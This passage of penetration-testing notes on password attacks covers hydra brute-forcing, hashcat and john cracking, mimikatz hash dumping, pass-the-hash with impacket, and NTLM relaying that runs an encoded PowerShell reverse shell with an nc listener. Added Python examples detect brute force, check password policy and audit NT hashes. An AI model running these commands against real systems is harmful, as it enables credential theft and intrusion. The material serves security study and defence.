# Password Attacks

### Attacking Network Services Logins <a href="#attacking-network-services-logins" id="attacking-network-services-logins"></a>

```bash
#If we have a username and password, we connect using SSH or RDP
#scan for the SSH port (default 22, or a non-standard port such as 2222)
sudo nmap -sV -p 2222 192.168.50.201
sudo nmap -sV -p 22 192.168.50.201
#one user, many passwords (brute force) against SSH on a non-standard port
sudo hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201
#many users, one password (password spraying) against RDP
sudo hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" rdp://192.168.50.202
#HTTP POST login form: ^PASS^ is replaced on each attempt, the last field is the string that marks a failed login
sudo hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"
```
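The hydra runs above look very different from the target's side: every guess is one failed login in the SSH daemon's log. The following Python example is added here and is not part of the original notes; it parses a handful of constructed sshd `auth.log` lines (hostname, PIDs and the 198.51.100.7 / 203.0.113.9 addresses are made up) and flags a source that produces a burst of failures, then reports any login that succeeded from that source afterwards, which is the event a defender most wants to see. The threshold and window values are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample auth.log lines in the syslog format OpenSSH writes on Debian-style hosts.
# Addresses are from documentation ranges; nothing here is a real host.
SAMPLE_AUTH_LOG = """\
Mar  4 10:15:01 web01 sshd[2113]: Failed password for george from 198.51.100.7 port 51122 ssh2
Mar  4 10:15:02 web01 sshd[2114]: Failed password for george from 198.51.100.7 port 51123 ssh2
Mar  4 10:15:02 web01 sshd[2115]: Failed password for invalid user admin from 198.51.100.7 port 51124 ssh2
Mar  4 10:15:03 web01 sshd[2116]: Failed password for george from 198.51.100.7 port 51125 ssh2
Mar  4 10:15:04 web01 sshd[2117]: Failed password for george from 198.51.100.7 port 51126 ssh2
Mar  4 10:15:05 web01 sshd[2118]: Accepted password for george from 198.51.100.7 port 51127 ssh2
Mar  4 10:20:00 web01 sshd[2201]: Failed password for alice from 203.0.113.9 port 40001 ssh2
Mar  4 10:31:00 web01 sshd[2250]: Accepted publickey for alice from 203.0.113.9 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>[\d.]+) port \d+ ssh2$"
)


def parse_events(log_text, year=2024):
    """Parse sshd login lines into dicts; lines that do not match the pattern are ignored."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year, so one is supplied to allow datetime arithmetic
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append({"ts": ts, "result": m["result"], "method": m["method"],
                       "user": m["user"], "src": m["src"]})
    return events


def detect_bruteforce(events, threshold=5, window_seconds=60):
    """Return {src: max_failures_in_window} for sources with >= threshold failures
    inside any sliding window of window_seconds (threshold/window are assumed tuning values)."""
    by_src = defaultdict(list)
    for e in events:
        if e["result"] == "Failed":
            by_src[e["src"]].append(e["ts"])
    flagged = {}
    for src, times in by_src.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            count = end - start + 1
            if count >= threshold:
                flagged[src] = max(flagged.get(src, 0), count)
    return flagged


def successes_after_burst(events, flagged):
    """(src, user) pairs that logged in successfully from a flagged source: a guess that landed."""
    return [(e["src"], e["user"]) for e in events
            if e["result"] == "Accepted" and e["src"] in flagged]


if __name__ == "__main__":
    evs = parse_events(SAMPLE_AUTH_LOG)
    hits = detect_bruteforce(evs)
    print("bursting sources:", hits)
    print("successful logins from those sources:", successes_after_burst(evs, hits))
```

On a real host the same signal is what fail2ban or sshguard act on; the example keeps the logic visible so the threshold can be reasoned about, and the "success after burst" check is the part worth alerting on rather than the failures alone.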

### Password Cracking Fundamentals <a href="#password-cracking-fundamentals" id="password-cracking-fundamentals"></a>

```bash
##Mutating Wordlists
#copy the first 10 lines of rockyou into a demo wordlist
head /usr/share/wordlists/rockyou.txt > demo.txt
#remove lines that start with "1" from the demo password file
sed -i '/^1/d' demo.txt
#demo3.rule contains the rules below, one rule per line ($X appends the character X, c capitalizes the first letter and lowercases the rest; functions apply left to right)
$1 c $!
$2 c $!
$1 $2 $3 c $!
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt -r demo3.rule --force
#prebuilt hashcat rules
ls -la /usr/share/hashcat/rules/

##Cracking Methodology 
1. Extract hashes
2. Format hashes    (identify the hash type with hash-identifier, hashid, or a web search)
3. Calculate the cracking time    
4. Prepare wordlist
5. Attack the hash

##Password Manager
#locate the KeePass database
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
#transfer the file to our Kali machine and crack it
ls -la Database.kdbx
keepass2john Database.kdbx > keepass.hash
#keepass2john prefixes the hash with the file name ("Database:"); remove that prefix so the line starts with $keepass$, otherwise hashcat rejects it
cat keepass.hash
hashcat --help | grep -i "KeePass"
hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force
#using the cracked password we can open the KeePass database

##SSH Private Key Passphrase
#when we obtain an id_rsa key and it asks for a passphrase on login, we have to crack the passphrase
ssh2john id_rsa > ssh.hash
#ssh2john also prefixes the hash with the file name ("id_rsa:"); remove it before passing the file to hashcat
cat ssh.hash
hashcat -h | grep -i "ssh"
#ssh.rule contains the rules below
c $1 $3 $7 $!
c $1 $3 $7 $@
c $1 $3 $7 $#
#cracking the ssh hash using hashcat
hashcat -m 22921 ssh.hash ssh.passwords -r ssh.rule --force
#cracking using john: john only loads rules from a named section, so the file appended to john.conf
#needs the header line [List.Rules:sshRules] above the three rules
sudo sh -c 'cat /home/kali/passwordattacks/ssh.rule >> /etc/john/john.conf'
john --wordlist=ssh.passwords --rules=sshRules ssh.hash
#after successfully cracking the passphrase we can log in over SSH
```
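The rule lines in demo3.rule and ssh.rule above are small programs that hashcat and john run over every word in the list. The Python example below is added here, not taken from the notes or from either tool; it implements the rule functions the page uses (`$X` append, `c` capitalize) plus a few closely related ones, expands a constructed three-word list exactly the way the cracker would, computes the keyspace behind methodology step 3 ("calculate the cracking time"), and turns the same machinery around into a password-policy check that rejects candidates which are just a dictionary word plus one of these mutations. The word list, hash rate and rule-function subset are assumptions.

```python
# Constructed inputs: the rules are the ones from demo3.rule and ssh.rule on this page,
# the words are a made-up three-entry list standing in for a wordlist file.
DEMO_RULES = ["$1 c $!", "$2 c $!", "$1 $2 $3 c $!"]
SSH_RULES = ["c $1 $3 $7 $!", "c $1 $3 $7 $@", "c $1 $3 $7 $#"]
DEMO_WORDS = ["password", "iloveyou", "princess"]


def apply_rule(word, rule):
    """Apply one rule line (whitespace-separated functions, left to right) to a word.
    Supported subset: $X append, ^X prepend, c capitalize, l lowercase, u uppercase, : no-op."""
    for func in rule.split():
        op, arg = func[0], func[1:]
        if op == "$":
            word = word + arg
        elif op == "^":
            word = arg + word
        elif op == "c":
            word = word[:1].upper() + word[1:].lower()
        elif op == "l":
            word = word.lower()
        elif op == "u":
            word = word.upper()
        elif op == ":":
            pass
        else:
            raise ValueError(f"unsupported rule function: {func!r}")
    return word


def expand(words, rules):
    """Yield (word, rule, candidate) for every combination, rule-major like the cracker's loop."""
    for rule in rules:
        for w in words:
            yield w, rule, apply_rule(w, rule)


def keyspace(words, rules):
    """Number of candidates the attack will test: words x rules."""
    return len(words) * len(rules)


def estimate_seconds(words, rules, hashes_per_second):
    """Worst-case time to exhaust the keyspace for one hash at a given rate (methodology step 3)."""
    return keyspace(words, rules) / hashes_per_second


def is_simple_mutation(candidate, words, rules):
    """Policy check: True if the candidate is reachable from a listed word via one of the rules,
    i.e. it would fall to this rule set in at most keyspace() guesses."""
    return any(c == candidate for _, _, c in expand(words, rules))


if __name__ == "__main__":
    for w, r, c in expand(DEMO_WORDS, DEMO_RULES):
        print(f"{w!r:12} {r!r:18} -> {c}")
    print("keyspace:", keyspace(DEMO_WORDS, DEMO_RULES))
    # hash rate is an assumed figure, plug in the benchmark from `hashcat -b` for a real estimate
    print("seconds at 1e9 H/s:", estimate_seconds(DEMO_WORDS, DEMO_RULES, 1e9))
    print("Princess2! is a simple mutation:", is_simple_mutation("Princess2!", DEMO_WORDS, DEMO_RULES))
```

The same `is_simple_mutation` check, fed the organisation's banned-word list and a bundle of common rules, is a cheap way to reject passwords at set time that would otherwise be the first to fall to the rule files under /usr/share/hashcat/rules/.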

### Working with Password Hashes <a href="#working-with-password-hashes" id="working-with-password-hashes"></a>

```bash
##Cracking NTLM
Get-LocalUser
#we use mimikatz.exe to dump the credentials stored on the system.
#to run mimikatz.exe, first open PowerShell with "Run as Administrator", then run the commands below
.\mimikatz.exe
privilege::debug
token::elevate
lsadump::sam
#the output contains the NT hashes, which we can crack offline
hashcat --help | grep -i "ntlm"
hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
#if we crack the hash we can use the password in further attacks

##Passing NTLM
#dump the hashes with mimikatz as above (PowerShell as Administrator, then the same three commands)
.\mimikatz.exe
privilege::debug
token::elevate
lsadump::sam
#we pass these hashes to authenticate as the account on other hosts
smbclient \\\\192.168.50.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b
#impacket takes LMHASH:NTHASH; the LM part can be all zeros when only the NT hash is known
impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212
impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212
#the hash values on the next two lines are placeholders, not real hashes
crackmapexec smb 192.168.x.x/24 -u "Frank Castle" -H 54vbfgb564bddfb --local-auth
psexec.py "Frank castle"@192.168.x.x -hashes bvsbvf:vfhbvfd

##Cracking Net-NTLMv2
#run responder and wait; any host that authenticates to us yields a Net-NTLMv2 hash
sudo responder -I tap0
#or trigger the authentication from the victim machine's cmd instead of waiting (192.168.119.2 is the host running responder)
dir \\192.168.119.2\test
#once we have Net-NTLMv2 hashes, we can try to crack them
hashcat --help | grep -i "ntlm"
hashcat -m 5600 paul.hash /usr/share/wordlists/rockyou.txt --force

##Relaying Net-NTLMv2
#"-enc" takes the base64-encoded PowerShell reverse shell one-liner (see "converting command to base64" in the web file upload attacks section)
sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc JABjAGwAaQBlAG4AdA..."
#now start the listener
nc -nvlp 8080
#if a host authenticates to us, the relayed session runs the command and we get a shell on the target
#or trigger it from the victim machine's cmd instead of waiting
dir \\192.168.119.2\test
#via this attack we may get privileged access
```
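The "Cracking NTLM" and "Passing NTLM" sections both rest on one property of the NT hash that hashcat mode 1000 targets: it is plain MD4 over the UTF-16LE password, with no salt and no iteration, so the hash is a password equivalent (which is why it can be passed) and two accounts with the same password have byte-identical hashes (which is why it cracks so fast). The Python example below is added here and is not from the notes or from any of the tools above; it re-implements MD4 (hashlib's md4 is frequently disabled under OpenSSL 3), derives NT hashes, and runs two defender-side audits over a constructed pwdump-style SAM dump: finding accounts that share a hash, and matching hashes against a banned-password list. The dump lines, usernames and banned list are made up; the `31d6cfe0...` and `8846f7ea...` values are the well-known hashes of the empty string and of "password".

```python
import struct
from collections import defaultdict

MASK32 = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data):
    """Pure-Python MD4 per RFC 1320 (three rounds of sixteen steps over 64-byte blocks)."""
    msg = bytearray(data)
    msg.append(0x80)                      # padding: 1 bit, zeros, then 64-bit LE bit length
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)

    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z

    # (mix function, round constant, message-word order, per-step rotation amounts)
    rounds = (
        (f, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        s = state[:]
        for fn, k, order, shifts in rounds:
            for j in range(16):
                a, b, c, d = (s[(i - j) % 4] for i in range(4))   # rotate register roles each step
                s[(-j) % 4] = _rotl((a + fn(b, c, d) + x[order[j]] + k) & MASK32, shifts[j % 4])
        state = [(v + w) & MASK32 for v, w in zip(state, s)]
    return struct.pack("<4I", *state)


def nt_hash(password):
    """NT hash as stored in the SAM and cracked with hashcat -m 1000: MD4(UTF-16LE(password)), no salt."""
    return md4(password.encode("utf-16-le")).hex()


# Constructed pwdump-style dump (user:rid:lmhash:nthash:::). The LM field is the standard
# "no LM hash" value; the NT fields are the hashes of "password" and of the empty string.
SAMPLE_SAM_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
nelly:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""


def parse_dump(text):
    """Map user -> NT hash from pwdump-style lines; malformed lines are skipped."""
    out = {}
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) >= 4 and len(parts[3]) == 32:
            out[parts[0]] = parts[3].lower()
    return out


def shared_hashes(dump):
    """Accounts sharing an NT hash share a password: with no salt this is a plain equality check."""
    by_hash = defaultdict(list)
    for user, h in dump.items():
        by_hash[h].append(user)
    return {h: users for h, users in by_hash.items() if len(users) > 1}


def banned_password_audit(dump, banned):
    """Hash each banned password once and look every account up in the table."""
    table = {nt_hash(p): p for p in banned}
    return {user: table[h] for user, h in dump.items() if h in table}


if __name__ == "__main__":
    dump = parse_dump(SAMPLE_SAM_DUMP)
    print("shared hashes:", shared_hashes(dump))
    print("banned passwords in use:", banned_password_audit(dump, ["password", "Welcome1", ""]))
```

The audit half is the point for a defender: a single MD4 per wordlist entry checks every account at once, and the empty-string hash `31d6cfe0...` showing up in a dump means an account with no password at all.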

